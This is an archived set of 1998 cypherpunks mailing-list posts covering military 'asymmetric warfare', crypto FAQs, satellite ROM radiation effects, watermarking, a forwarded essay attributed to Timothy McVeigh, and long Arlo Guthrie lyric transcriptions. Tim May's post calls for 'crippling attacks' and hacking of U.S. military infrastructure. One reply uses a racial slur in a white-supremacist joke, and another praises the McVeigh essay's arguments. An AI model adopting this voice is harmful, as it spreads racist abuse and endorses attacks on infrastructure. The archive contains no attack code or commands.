> .+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
> ======================= http://www.sundernet.com ==========================







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Thu, 28 May 1998 18:01:02 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Asymmetric Warfare
In-Reply-To: <199805281951.PAA25901@camel14.mindspring.com>
Message-ID: <v03130308b193b700702c@[209.133.20.20]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:49 PM -0700 5/28/98, John Young wrote:
>Date: Wed, 27 May 1998 15:34:10 -0500
>From: "90. USAFnews" <usafnews@AFNEWS.AF.MIL>
>
>980734.  Special operations commander outlines future threats
>by Capt. John Paradis
>16th Special Operations Wing Public Affairs
>
>HURLBURT FIELD, Fla. (AFNS) -- More Chechnyas.  If a military strategist
>needed to look at a good model for the typical future conflict, the war
>torn republic of Chechnya comes to mind, said Gen. Peter J. Schoomaker,
>U.S. Special Operations Command commander in chief.
....

Yes, Chechnya is the model for the U.S. to follow: the Central Authority
attempting to crush a local rebellion by shelling cities, razing farms,
shooting suspected rebels without trials, and blockading entire provinces
to starve them into submission.

As the United States increasingly moves toward police state status and
chooses smaller nations to pick on (Panama, Somalia, Haiti, etc.), the
Armed Forces will come to resemble a domestic army. Something the Founders
were adamantly opposed to (between "no standing army" (ha!), Washington's
warning about avoiding foreign wars, and Posse Comitatus, which forbids a
domestic role for the Army).

>It's such "asymmetric" opponents like separatists, rebel groups,
>insurgents and terrorists that U.S. special operations forces will need
>to prepare for -- enemies who won't attack U.S. strategic strengths, but
>will instead target U.S. vulnerabilities by executing unorthodox
>measures to gain success, Schoomaker said.
>

Sounds good to me, attacking the Central Authority.

We need to launch our own crippling attacks on the U.S. military
infrastructure--it has become a cancer on the nation. Hacking their
computers and misdirecting Galaxy 4 were only the opening shots in this new
war.

Crypto is our strongest weapon. They know it. And they want it crippled.


--Tim May

"The tree of liberty must be watered periodically with the blood of
tyrants...."
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist              | black markets, collapse of governments.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Xcott Craver <caj@math.niu.edu>
Date: Thu, 28 May 1998 18:16:15 -0700 (PDT)
To: Nalus Optic <one4evil@juno.com>
Subject: Re: Lack of net access blows:
In-Reply-To: <19980528.071047.4222.8.one4evil@juno.com>
Message-ID: <Pine.SUN.3.91.980528195946.15686A-100000@baker>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 28 May 1998, Nalus Optic wrote:

> Cyberpunks,
> 	
> 	Que pasa?  My name is D and I am new to the list...I will most
> likely just be lurking for a while, till I get a visit from the Duel
> Pentium II 266, 128megs of RAM, running Linux on one PII and Win98 on the
> Other Fariy...She should be along by the end of the summer...

Hey, if you're a BeOS developer (and you can become one for free,) United 
Micro will give you a discount on a dual PII-266 system w/ 128 Megs.  I 
have just such a beast, and it ain't bad.  SMP rocks.  Haven't tried to 
put Windows on it, though. 

> 	Anywhoo, the point of the subject is that at this point and time
> I don't have net access so I was hopeing someone out there would send me
> the FAQ that is talked of in the welcome message.  It can be found at:

> 	anonymous ftp to rtfm.mit.edu:pub/usenet-by-group/sci.crypt

	Well sir, there's about 4 FAQs there, one of which is in
	10 parts.  What do you want?

	There's the Cryptography FAQ (the big one), the snake-oil
	FAQ, the RSA-Cryptography-today FAQ, and the SSL talk list
	FAQ.  The 10 parts of the big one:

		Overview		Public-key Cryptography
		Net Etiquette		Digital Signatures
		Basic Cryptology	Technical Miscellany
		Mathematical Cryptology	Other Miscellany
		Product Ciphers		References

	They range in size from 1-20 k, and ~100 k for the whole
	thing.
							-Xcott
		
 ,oooooooo8     o     ooooo@math.niu.edu  --  http://www.math.niu.edu/~caj/
o888'   `88   ,888.    888                                                 
888          ,8'`88.   888    "In Geometry, there is no royal hyperspace
888o.   ,oo ,8oooo88.  888   wormhole."  --Buck Euclid in the 25th century
`888oooo88 o88o  o888o 888                                                 
____________________8o888'_________________________________________________






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cons0005@algonquinc.on.ca
Date: Thu, 28 May 1998 19:27:54 -0700 (PDT)
To: tcmay@got.net
Subject: Re: D.A.R.E. and a Bullpup
In-Reply-To: <199805211707.NAA14117@panix2.panix.com>
Message-ID: <199805290226.WAA15318@algnet.algonquinc.on.ca>
MIME-Version: 1.0
Content-Type: text/plain


Date sent:      	Thu, 21 May 1998 13:56:38 -0700
To:             	cypherpunks@cyberpass.net
From:           	Tim May <tcmay@got.net>
Subject:        	D.A.R.E. and a Bullpup
Send reply to:  	Tim May <tcmay@got.net>

> I often wear a t-shirt around town which reads:
> 
> 
> D.  A.  R.  E.
> 
> I turned in my parents
> and all I got was this
> lousy t-shirt
> 
I think you should get one:


If your a nigger,
I'm Aryan.



<G>


http://www.geocities.com/CapitolHill/Senate/8018/ 
http://wabakimi.carleton.ca/~nmarion/
http://www.engsoc.carleton.ca/~jproud/yash/
(For when you're bored)-PGPd Mail Preferred





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "snow" <snow@smoke.suba.com>
Date: Thu, 28 May 1998 21:41:40 -0700 (PDT)
To: caj@math.niu.edu (Xcott Craver)
Subject: Re: Holy QPRNF...
In-Reply-To: <199805050043.TAA22628@baker.math.niu.edu>
Message-ID: <199805290335.WAA01861@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


> http://biz.yahoo.com/prnews/980504/ca_live_pi_1.html
> Summary:  Digimarc and Live Picture, Inc., team up to offer watermarking
> 	  services.  
> || ``Until very recently, the creative community was extremely skeptical of 
> || licensing and marketing their work over the Web, which they viewed as an 
> || absolute free-for-all,'' said Doug Dawirs, director of online services at 
> || The Workbook. ``Now these same people and companies are jumping in with 
> || both feet.''
> I hope no content creators mistakenly think that this is electronic
> content protection (possibly, one can say an aid to detect _unintentional_
> illicit use, but not intentional theft), or else there will be a 
> free-for-all of a legal kind a little further down the road.

	I work for a company who displays much of their work on the 
Web, and we are often sited by Digimarc as a "customer". 

	We (AFAICT) stoped bothering with their product (probably an older
version) simply because it didn't work. 

	I can take any image where the watermark IS NOT visible, and 
make it so that your scanning software doesn't work, yet most people wouldn't
notice a bloody thing. 

	Suckerware. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Emery <die@pig.die.com>
Date: Thu, 28 May 1998 20:10:26 -0700 (PDT)
To: Tim May <tcmay@got.net>
Subject: Re: Satellite processing (was Re: DRUDGE-REPORT-EXCLUSIVE pablum)
In-Reply-To: <7iF8Pe1w165w@decode.com>
Message-ID: <19980528231016.A16286@die.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, May 28, 1998 at 06:22:16PM -0700, Tim May wrote:

> 
> ROMs currently have no sensitivity to cosmic rays or alpha particles from
> natural radioactivity in the environment, and are not expected to. Single
> event upsets typically happen with cross-coupled static RAM cells or with
> dynamic RAMs. _Some_ errors happen in logic circuits, including
> microprocessors, but not many.
> 
> No doubt some examples of reported errors in ROM circuits can be found, but
> I suspect the errors are either in the decode logic or elsewhere, and
> certainly not in the mask-programmable bits or the blown fuse sections.
> Lots of ROM types exist, so I don't want to try to list all major types
> here.
> 
> Some EAROMs (Electrically Alterable) or EEPROMs (Electrically Erasable) are
> sensitive to some radiation events, but not nearly as sensitive as RAM
> chips are. The IEEE Transactions on Nuclear Science, the December issue of
> every year, is devoted to reporting on actual sensitivity levels and
> physical mechanisms.

	I certainly defer to your expertise, as I have no particular
knowlage of radiation effects aside from reading an occasional technical
paper or article touching on the subject tangentially.   What I should
have said in any case is damage to  Flash EPROM or other electrically
programmed EPROM, as several people have pointed out that fuse and mask
programmed ROMs are not at all subject to single event radiation damage.
I suppose that  ROMs on board a satellite could easily afford to be
masked types, but of course there still are sound engineering reasons to
keep ROM'd code as minimal, simple and straighforward as possible, especially
when it cannot ever be changed and hundreds of millions of dollars of
satellite depends on it.



-- 
	Dave Emery N1PRE,  die@die.com  DIE Consulting, Weston, Mass. 
PGP fingerprint = 2047/4D7B08D1 DE 6E E1 CC 1F 1D 96 E2  5D 27 BD B0 24 88 C3 18





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSqncrs@aol.com
Date: Thu, 28 May 1998 22:10:22 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Timmy Mc Veigh
Message-ID: <97a8ae6d.356e42ee@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 5/28/98 10:41:37 PM Central Daylight Time,
nobody@nsm.htp.org quotes:

<< ... It seems ironic and hypocritical that an act as viciously condemned
 in Oklahoma City is now a "justified" response to a problem in a
 foreign land. Then again, the history of United States policy over
 the last century, when examined fully, tends to exemplify
 hypocrisy. ... >>

I tell you folks, that's some of the best written propaganda I've ever seen. 

Here's it's only faults that I see.  Tim McVeigh is now taking the position
that the OKCity bombing was a bad thing.  I don't ever recall him ever taking
that position before.  And, while his post recognizes the old saying '2 wrongs
don't make a right', the post still goes against that saying (thanks to his
history.)

But he's definitely got some valid points as to how it relates to the USA's
use of weapons of mass destruction and Iraq, it's an excellent argument for
that.

Stan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@nsm.htp.org
Date: Thu, 28 May 1998 20:08:12 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Timmy Mc Veigh
Message-ID: <19980529030659.16949.qmail@nsm.htp.org>
MIME-Version: 1.0
Content-Type: text/plain


Text of essay said written by Timothy McVeigh - something
	to think about.

May 28, 1998
Web posted at: 10:10 p.m. EDT (0210 GMT)

(AP) -- The June 1998 issue of Media Bypass Magazine includes this
essay it says was written by Timothy McVeigh:

The administration has said that Iraq has no right to stockpile
chemical or biological weapons ("weapons of mass destruction") --
mainly because they have used them in the past.

Well, if that's the standard by which these matters are decided,
then the U.S. is the nation that set the precedent. The U.S. has
stockpiled these same weapons (and more) for over 40 years. The
U.S. claims that this was done for deterrent purposes during its
"Cold War" with the Soviet Union. Why, then, is it invalid for Iraq
to claim the same reason (deterrence) -- with respect to Iraq's
(real) war with, and the continued threat of, its neighbor Iran?


The administration claims that Iraq has used these weapons in the
past. We've all seen the pictures that show a Kurdish woman and
child frozen in death from the use of chemical weapons. But, have
you ever seen these photos juxtaposed next to pictures from
Hiroshima or Nagasaki?

I suggest that one study the histories of World War I, World War II
and other "regional conflicts" that the U.S. has been involved in
to familiarize themselves with the use of "weapons of mass
destruction."

Remember Dresden? How about Hanoi? Tripoli? Baghdad? What about the
big ones -- Hiroshima and Nagasaki? (At these two locations, the
U.S. killed at least 150,000 non-combatants -- mostly women and
children -- in the blink of an eye. Thousands more took hours,
days, weeks, or months to die.)

If Saddam is such a demon, and people are calling for war crimes
charges against him and his nation, whey do we not hear the same
cry for blood directed at those responsible for even greater
amounts of "mass destruction" -- like those responsible and
involved in dropping bombs on the cities mentioned above?

The truth is, the U.S. has set the standard when it comes to the
stockpiling and use of weapons of mass destruction.

Hypocrisy when it comes to the death of children? In Oklahoma City,
it was family convenience that explained the presence of a day-care
center placed between street level and the law enforcement agencies
which occupied the upper floors of the building. Yet when
discussion shifts to Iraq, any day-care center in a government
building instantly becomes "a shield." Think about that.
(Actually, there is a difference here. The administration has
admitted to knowledge of the presence of children in or near Iraqi
government buildings, yet they still proceed with their plans to
bomb -- saying that they cannot be held responsible if children
die. There is no such proof, however, that knowledge of the
presence of children existed in relation to the Oklahoma City
bombing.)

When considering morality and "mens rea" (criminal intent) in light
of these facts, I ask: Who are the true barbarians?

Yet another example of this nation's blatant hypocrisy is revealed
by the polls which suggest that this nation is greatly in favor of
bombing Iraq.

In this instance, the people of the nation approve of bombing
government employees because they are "guilty by association" --
they are Iraqi government employees. In regard to the bombing in
Oklahoma City, however, such logic is condemned.

What motivates these seemingly contradictory positions? Do people
think that government workers in Iraq are any less human than those
in Oklahoma City? Do they think that Iraqis don't have families who
will grieve and mourn the loss of their loved ones? In this
context, do people come to believe that the killing of foreigners
is somehow different than the killing of Americans?

I recently read of an arrest in New York City where possession of a
mere pipe bomb was charged as possession of a "weapon of mass
destruction." If a two-pound pipe bomb is a "weapon of mass
destruction," then what do people think that a 2,000-pound
steel-encased bomb is?

I find it ironic, to say the least, that one of the aircraft that
could be used to drop such a bomb on Iraq is dubbed "The Spirit of
Oklahoma."

This leads me to a final, and unspoken, moral hypocrisy regarding
the use of weapons of mass destruction.

When a U.S. plane or cruise missile is used to bring destruction to
a foreign people, this nation rewards the bombers with applause and
praise. What a convenient way to absolve these killers of any
responsibility for the destruction they leave in their wake.

Unfortunately, the morality of killing is not so superficial. The
truth is, the use of a truck, a plane, or a missile for the
delivery of a weapon of mass destruction does not alter the nature
of the act itself.

These are weapons of mass destruction -- and the method of delivery
matters little to those on the receiving end of such weapons.

Whether you wish to admit it or not, when you approve, morally, of
the bombing of foreign targets by the U.S. military, you are
approving of acts morally equivalent to the bombing in Oklahoma
City. The only difference is that this nation is not going to see
any foreign casualties appear on the cover of Newsweek magazine.

It seems ironic and hypocritical that an act as viciously condemned
in Oklahoma City is now a "justified" response to a problem in a
foreign land. Then again, the history of United States policy over
the last century, when examined fully, tends to exemplify
hypocrisy.

When considering the use of weapons of mass destruction against
Iraq as a means to an end, it would be wise to reflect on the words
of the late U.S. Supreme Court Justice Louis Brandeis. His words
are as true in the context of Olmstead as they are when they stand
alone:

"Our government is the potent, the omnipresent teacher. For good or
ill, it teaches the whole people by its example."

Sincerely,

Timothy J. McVeigh







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSqncrs@aol.com
Date: Fri, 29 May 1998 01:10:32 -0700 (PDT)
To: Cypherpunks@toad.com
Subject: A Plug
Message-ID: <82a314d7.356e6c59@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Hey look, Nobody's expressed interest in joining FreeGroup, but he can't come
in anomonously because of the 'machine' involved with my list.  So, the only
way he can do it (and remain anonomous) is by coming in under a different
alias (since the other one's been uncovered, IMHO.)  But, if he simply applies
now under a different alias, he knows that I know it's him, so I need to give
him cover, so I'm going to give a little FreeGroup plug to all the
Cypherpunks, so I won't really know it's him that's applying, when he does.
In reality, other Cypherpunks are also very welcome to join.

So Cypherpunks, here's something you (almost) missed by not being in
FreeGroup, posts that show that the right-wing stole the anti-FBI/Government
sentiment card from guess who, us Liberals!  We never took it as far as they
did, though.  We aren't that stupid :-) And if somehow my memory fails and I
already posted this (and any others) here, let me apologize in advance (though
somehow, I doubt anyone will mind (except perhaps any FBI agents that might be
viewing ;-) )  But before we get to the FBI (a favorite on this list, from my
obvservations), first we talk about other government agencies -
======
Subj:	The Arch Angel
Date:	5/27/98
To: [FreeGroup]

Bet some of you newcomers wonder where the right-wing got the idea that being
anti-government might be a popular idea.  I'll tell you where.  They got it
from us liberals

... Around here (thanks to Fred), this guy is known as the 'Arch Angel Arlo'.
He was my favorite political composer of the era -
======
Alices Resturant
Alice's Restaurant Massacree - by Arlo Guthrie

This song is called Alice's Restaurant, it's a - bout Alice - and the
restaurant
But Alice's Restaurant is not the name of the restaurant that's - just the
name of the song
That's why I call the song Alice's Restaurant

You can get anything you want, at Alice's Restaurant 
You can get anything you want - at Alice's Restaurant
Walk right in it's around the back - just a half a mile from the railroad
track
You can get anything you want, at Alice's Restaurant

Now it all started 2 Thanksgivings ago thats on 2 years ago on Thanksgiving
when my friend and I went up to visit Alice at the Restaurant, but - Alice
doesn't live in the Restaurant, she - lives in the church nearby the
restaurant in the bell tower, with her husband Ray and, Fasha the dog and
living in the bell tower like that they got a lot of room downstairs where the
pews used to've been, having all that room, seein' how they took out all the
pews, they decided that they didn't have to take out their garbage for a long
time.

We got up there, we found all the garbage in there and we decided it'd be a -
friendly gesture for us to take the garbage down to the city dump.  So we took
the half-a-ton of garbage put it in the back of a red VW microbus took shovels
and rakes and impliments of destruction and - headed on toward the city dump. 

Well we got there there's a big sign and a chain across the dump saying
"closed on Thanksgiving" and, we had never heard of a dump closed on
Thanksgiving before and with - tears in our eyes we drove off into the sunset
looking for - another place to put the garbage.  We didn't find one -

'Till we came to a side road and off the side of the side road was another 15
foot cliff and, at the bottom of the cliff was another pile of garbage and, we
decided that 1 big pile was better than 2 little piles and rather than bring
that one up, we decided to throw ours down.  That's what we did. Drove back to
the church had a Thanksgiving dinner that couldn't be beat went to sleep and
didn't get up until the next morning, when we got a phone call from Officer
Obie.

Said "Kid -  we found your name on an envelope at the bottom of a half-a-ton
of garbage and - just wanted to know if you had any information about it" and
I said "yes sir Officer Obie, I cannot tell a lie - I put that envelope under
that garbage."

After speaking to Obie for about 45 minutes on the telephone we finally
arrived at the truth of the matter and said that we had to go down and pick up
the garbage and, also had to go down and speak to him at the Police Officer
station so we got in the red, VW microbus with the shovels and rakes and
implements of destruction and headed on towards the Police Officer station.  

Now friends, there was only 1 of 2 things Obie could've done at the Police
station, and the 1st was that he could've givin us a medal for being so brave
and honest on the telephone, which wasn't very likely, and we didn't expect
it, and the other thing was, that he could've bawled us out and told us never
to be seen driving garbage around the vicinity again.  Which is what we
expected, but when we got to the Police Officer station, there was a 3rd
possibility that we hadn't even counted upon, and we was both immediatly
arrested.  Handcuffed and I said Obie "I - don't think I can pick up the
garbage with these handcuffs on."  Said "Shut up kid, get in the back of the
patrol car" and that's what we did, sat in the back of the patrol car and
drove to the quote "scene-of-the-crime" unquote.


I want to tell you about the town of Stockbridge, Massachusetts where this
happened here, they got 3 stop signs - 2 police officers and 1 police car, but
when we got to the "scene-of-the-crime", there was 5 police officers and 3
police cars - being the biggest crime of the last 50 years and everybody
wanted to get in the newspaper story about it.  And they was using up all
kinds of cop equipment that they had hanging around the Police Officer
station.  They was taking plaster tire track footprints dog smellin' prints,
and they took twenty-seven 8 by 10 color glossy photographs, with circles and
arrows and a paragraph on the back of each one explaining what each one was to
be used as evidence against us.  Took pictures of the approach, the getaway,
the northwest corner, the southwest corner, and that's not to mention the
ariel photography.

After the ordeal, we went back to the jail Obie said he was gonna put us in
the cell, said "Kid, I'm gonna put you in the cell, I want your wallet and
your belt."  I said "Obie, I can understand you wanting my wallet so I don't
have any money to spend in the cell but what do you want my belt for?" Said
"Kid - we don't want any hangins."  Said "Obie, did you think I was gonna hang
myself for littering?"  Obie said he was making sure, and friends, Obie was
'cause he took out the toilet seat so I couldn't hit myself over the head and
drown.  And he took out the toilet paper so I couldn't bend the bars, roll
out, roll the toilet paper out the window, slide down the roll and have an
escape.  Obie was making sure, and it was about 4 or 5 hours later, that
Alice, remember Alice?  It's a song about Alice.  Alice came by and with a few
nasty words to Obie on the side - bailed us out of jail, we went back to the
church, had another Thanksgiving dinner that couldn't be beat and didn't get
up until the next morning, when we all had to go to court.

We walked in, sat down. Obie came in - with the twenty-seven 8 by 10 color
glossy pictures with circles and arrows and a paragraph on the back of each
one, sat down.  Man came in said "All rise." We all stood up	and Obie stood up
with the twenty-seven 8 by 10 color glossy pictures and the Judge walked in,
sat down with a seeing-eye dog and he sat down.  We sat down.  Obie looked at
the seeing-eye dog.  And then at the twenty-seven 8 by 10 color glossy
pictures with the circles and arrows and a paragraph on the back of each one -
and looked at the seeing-eye dog.  And then at the twenty-seven 8 by 10 color
glossy pictures with the circles and arrows and a paragraph on the back of
each one and began to cry - 'cause Obie came to the realization, that it was a
typical case - of 'American Blind Justice', and there was nothing he could do
about it, and the Judge wasn't gonna look at the twenty-seven 8 by 10 color
glossy pictures with the circles and arrows and a paragraph on the back of
each one explaining what each one was to be used as evidence against us.  And
we was fined fifty dollars and had to - pick up the garbage in the snow, but -
that's not what I came to tell you about.  Came to talk about the draft.


They got a building down in New York City it's called 'Whitehall Street' where
you walk in and get injected, inspected, detected, infected, neglected and
selected.  I went down to get my physical examination one day and I walked in,
sat down - got good and drunk the night before so I looked and felt my best
when I went in that mornin'.  'Cause I wanted to look like the all American
kid from New York City.  Man I wanted, I wanted to feel like the all, I wanted
to be - the all American kid, from New York and I walked in, sat down I was
hung down, brung down, hung up and all - kinds of mean, nasty, ugly things,
and I walked in, I sat down, they gave me a piece of paper that said "Kid -
see the Psychiatrist, room 6O4.  And - I went up there, said "Shrink, I wanna
kill. I mean I wanna, wanna kill.  Kill.  I wanna, wanna see, I wanna see
blood and gore and guts and veins in my teeth. Eat dead burnt bodies.  I mean
kill. Kill. KILL. KILL."  And I started jumping up and down, yellin' "KILL.
KILL."  And he started jumping up and down with me with me, and we was both
jumpin' up and down, yelling "KILL.  KILL."  And the Sergeant came over,
pinned a medal on me, sent me down the hall, said "You're our boy."  Didn't
feel to good about it, uh, proceeded down the hall getting more injections,
inspections, detections, neglections, and all - kinds of stuff that they was
doin' to me at the thing there and I was there for 2 hours, 3 hours, 4 hours -
I was there a long time goin' through all kinds of mean, nasty, ugly things
and I  - was, just having a tough time there and they was inspecting,
injecting every - single part of me, and they was leavin' no place untouched.
Proceeded through and I - when finally came to see the very last man, I walked
in, I walked in, sat down after a whole big thing there, and I walked up and
said "What do ya want".  He said "Kid, we only got one question - have you
ever been arrested?"

I proceeded to tell him the story of the 'Alice's Restaurant Massacree' with -
full orchestration and five part harmony and stuff like that and then all the
phenomina "Stop It Right There" said "Kid - did you ever go to court?"

I proceeded to tell him the story of the twenty-seven 8 by 10 color glossy
pictures with the circles and arrows, and a paragraph on the back of each one
"Stop It Right There" and said "Kid - I want you to go over and sit down on
that bench that says 'Group W' - NOW KID!"

I, and I, I walked over to the, to the bench there, and there is - there's
Group W's where they, where they put ya, if you may not be moral enough to, to
join the Army, after committing your special crime and - there was all kinds
of mean, nasty, ugly looking people on the bench there -  mother rapers -
father stabbers - father rapers! - father rapers sittin' right there on the
bench next to me and, one, they was mean and nasty and ugly, and horible and
crime, fighting guys was sittin' on the bench.  And the meanest, ugliest,
nastiest  one - the meanest father raper of them all, was coming over to me,
and he was mean and ugly and nasty and horible and all kinds of things, and he
sat down next to me and said "Kid - what did ya get?"

I said "I didn't get nothin', I had to pay fifty dollars and pick up the
garbage". He said "What were you arrested for, kid?" and I - said "Littering"
- and they all moved away from me on the bench there and the hairy eyeball,
and all kinds of mean, nasty things, 'till I said "and creating a nuisance"
and they all came back, shook my hand and we had a great time talkin' about
crime, mother stabbin', mother raping, and all kinds of groovy things that we
was talkin' about on the bench.  And everything was fine, we was smoking
cigarettes and all kinds of things, until the Sergeant came over - had some
paper in his hand, said "Kids - 


This piece of papers got 47 word 37 sentences 58 word we want to know detail
of the crime time crime and any kind of thing you got to say time and tune
about the crime unknown arresting officers name and everything you got to
say..." and he talked for 45 minutes, and nobody understood a word that he
said, but we had fun filling out the forms and playing with the pencils on the
bench there and - I filled out the 'Massacree' with the 4 part harmony and -
wrote it down there, just like it was and everything was fine and I - put down
the pencil and turned over the piece of paper and there - there on the other
side - in the middle of the other side - away from everything else on the
other side - in parenthesis - capital letters - quotated - read the following
words.  

"Kid - have you rehabilitated yourself?"  I went over to the Sergeant and said
"Sergeant, you've got a - lot of damn gall to ask me if I've rehabilitated
myself, I mean - I mean - I mean, I just, I'm sittin' here on the bench, I
mean I'm sitting on the Group W bench - because you want to know if I'm moral
enough to join the Army, burn women, kids houses and villages after being a
litterbug."  He looked at me and said "Kid - we don't like your kind - and
we're going to send your fingerprints off to Washington" and friends -
somewhere in Washington enshrined in some little folder is a - study in black
and white - of my fingerprints.  

And the only reason why I'm singing you this song now is because you may know
somebody in a similar situation - or YOU may be in a similar situation and if
you're in a situation like that - there's only one thing you can do is, walk
into the shrink wherever you are, just walk in and say "Shrink -

You can get anything you want at Alice's Resaurant" and walk out.  Ya know, if
1 person, just 1 person does it they'll think he's really sick and they wont
take him.  And if 2 people, 2 people do it - in harmony - they may think
they're both faggots and won't take either of 'em.  And if 3 people do it - 3,
can you imagine 3 people walking in singing a bar of 'Alice's Restaurant' and
walking out?  They may think it's an organization.  And can you, can you
imagine 5O people a day?  I said 5O people a day walking in singing a bar of
'Alice's Restaurant' and walking out.  And friends they may think it's a
movement, and that's what it is.  The 'Alice's Restaurant Anti-Massecree'
movement, and all you got to do to join, is sing it the next time it comes
around on guitar - with feeling.  So we'll wait 'till it comes around on the
guitar here and sing it when it does - here it comes - 

You can get anything you want, at Alice's Restaurant 
You can get anything you want - at Alice's Restaurant
Walk right in it's around the back - just a half a mile from the railroad
track
You can get anything you want, at Alice's Restaurant

That was horrible.  You want to end war and stuff you got to sing loud.  You
could put alot, I've been singing this song now for about 25 minutes - I could
sing it for another 25 minutes - I'm not proud - or tired - so we'll wait
'till it comes around again and - this time with 4 part harmony and feeling -
we're just waiting for it to come around is what we're doing - allright now -

You can get anything you want, at Alice's Restaurant, excepting Alice
You can get anything you want - at Alice's Restaurant
Just walk right in it's around the back - just a half a mile from the railroad
track
and you can get anything you want, at Alice's Restaurant

Da da da da da dum, at Alice's Restaurant!
======
Stan,
FreeGroup - "Just Say It!"
http://members.aol.com/whtsametau/FreeGroup.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSqncrs@aol.com
Date: Fri, 29 May 1998 01:15:33 -0700 (PDT)
To: Cypherpunks@toad.com
Subject: More Government Bashing
Message-ID: <32235dca.356e6e78@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Ah yes, a bit of local police bashing, courts bashing and draft bashing.
Here's a little more local police bashing with a tiny bit of FBI bashing
thrown in to segue into the next post -
@@@@@@
Subj:	Another Cop Bashing Story
Date:	5/28/98
To:	[FreeGroup]

Again, I can't resist -
=====
Motorcycle (Significance of the Pickle) Song - Arlo Guthrie

I don't want a pickle
Just want to ride on my motorsickle
And I don't want a tickle
I'd rather ride on my motorsickle
And I don't want to die
Just want to ride on my motorcy - cle

You know, it's been about 12 years now that, I've been singing this dumb song.
You know, it's amazing, it's amazing that somebody could get away with singing
a song this dumb for that long. But you know, hey you know what's more amazing
than that is that, is that uh, somebody could make a living singing a song
this dumb.  But, that's America!

You know, I told about everything there was to tell about it.  When I wrote
it, how come, why, what for, but you know the one thing, that I always used to
neglect to explain, was the significance of the pickle.

It was the time I was riding my bike, I was going down a mountain road.  I was
doing 150 miles an hour.  On one side of the mountain road there was a
mountain, and on the other side there was nothin', it was just a cliff in the
air.  But I wasn't paying attention you know I was just driving down the road.
All of a sudden by accident, a string broke off my guitar.  It broke you know
right there went flying across the road that way, wrapped itself around a
yield sign.  Well the sign didn't break, it didn't come out of the ground, the
string stayed wrapped around it. Stayed in the other end of my guitar, I held
on to my guitar with one hand.  I held on to the bike with the other.  I made
a sharp turn off the road.  Luckily I didn't go into the mountain. I went over
the cliff.  I was doing 150 miles an hour sideways, and 500 feet down at the
same time.  Hey, I was looking for the cops, 'cause you know, hey I knew that
you know it, it was illegal.

Well, I knew that it was it.  I knew I didn't have long, to live in this
world.  And in my last remaining seconds in the world I knew that it was my
obligation to, write one last farewell song to the world.  Took out a piece of
paper, I pulled out a pen, and it didn't write I, I had to put another ink
cartridge in it.  I sat back and I thought for awhile and then it come to me,
it come like a flash, like a vision burnt across the clouds.  I just wrote it
down.  I learned it right away.  I don't want a pickle, just want to ride on
my motorsickle.  And I don't want a tickle, I'd rather ride on my motorsickle.
And I don't want to die, just, want to ride on my motorcy - cle.  Hey I, you
know, I knew it wasn't the best song I ever wrote, but I didn't have time to
change it. But you know the most amazing thing was, that I didn't die, I
landed on the top of a police car, and it died.

I come into town, I come into town at a screaming 175 miles an hour singing my
new motorcycle song.  I stopped out in front of the deli and out in front of
the deli was a man, eating the most tremendous pickle, a pickle the size of
four pregnant watermelons, just a huge monster pickle.  He walked up to me,
pushed a pickle in my face and started asking me questions.  It was about the
same time I noticed a pickle in my face I noticed a cord hanging from the long
end of the pickle going up his sleeve down his shirt into his pants and shoes
out into a briefcase he had near his feet.

I knew it wasn't a ordinary pickle.  But it was about the same time I noticed
the cord hanging out ot the pickle that a 4 foot cop arrived, with a 5 foot
gun.  A cop that one time, must have been around 6 foot 3, but was met at the
bottom of a mountain, by a flying, singing, writing, weirdo freak.  He walked
up and with one tremendous hand he grabbed the pickle away from the other guy.
He threw it, a hundred feet, straight up in the air.  And while the pickle was
half way between going up and coming down, he took out his gun and put a 3
inch bullet hole right through the long end of the pickle.  It started coming
back down.  He stuck out his foot.  He caught the pickle on his big toe.  And
balancing the pickle on his big toe he reached his huge hand into his little
pocket, pulled out a 10 foot ticket.  He borrowed my pen, he wrote it up, then
he rolled it up, and stuffed it in the bullet hole in the middle of the
pickle, took the pickle with the ticket and shoved it down my throat.  It was
at that very moment, that the pickle with the ticket was going down my throat
that, I knew for sure that, that I didn't want a pickle.

I don't want a pickle
I just want to ride on my motorsickle
And I don't want a tickle
I'd rather ride on my motorsickle
And I don't want to die
Just want to ride on my, motorcy - cle
@@@@@
And on to the meat of the matter, the FBI -
@@@@@
Subj:	Re: Another Cop Bashing Story + FBI Bashing
Date:	5/29/98
To:	[FreeGroup]
<< YES!!! I actually do have an original copy! It's on the album "ARLO" . I'll
work on that transcript this weekend. I also have "Hobo's Lullaby" Pretty cool
stuff dude!   >>

Ok, then you deserve this -
======
The Pause of Mr. Claus - Arlo Guthrie

(introduction) This next song, we're going to dedicate to a great American
organization.  Tonight, I'd like to dedicate this, to our boys, in the FBI.
Well, wait a minute, it's hard to be a FBI man.  I mean, first of all to be a
FBI man you have to be over 40, years old.  And the reason is, that it takes
at least 25 years with the organization, to be that much of a bastard.  Now,
it's true you just can't join, you know it kinda it needs a atmosphere where
your natural bastardness, can grow and develop and, take a meaningful shape in
today's complex society.  

But that's not why I want to dedicate the song to the FBI.  I mean the job
that they have to do, is a drag!  I mean they have to follow people around.
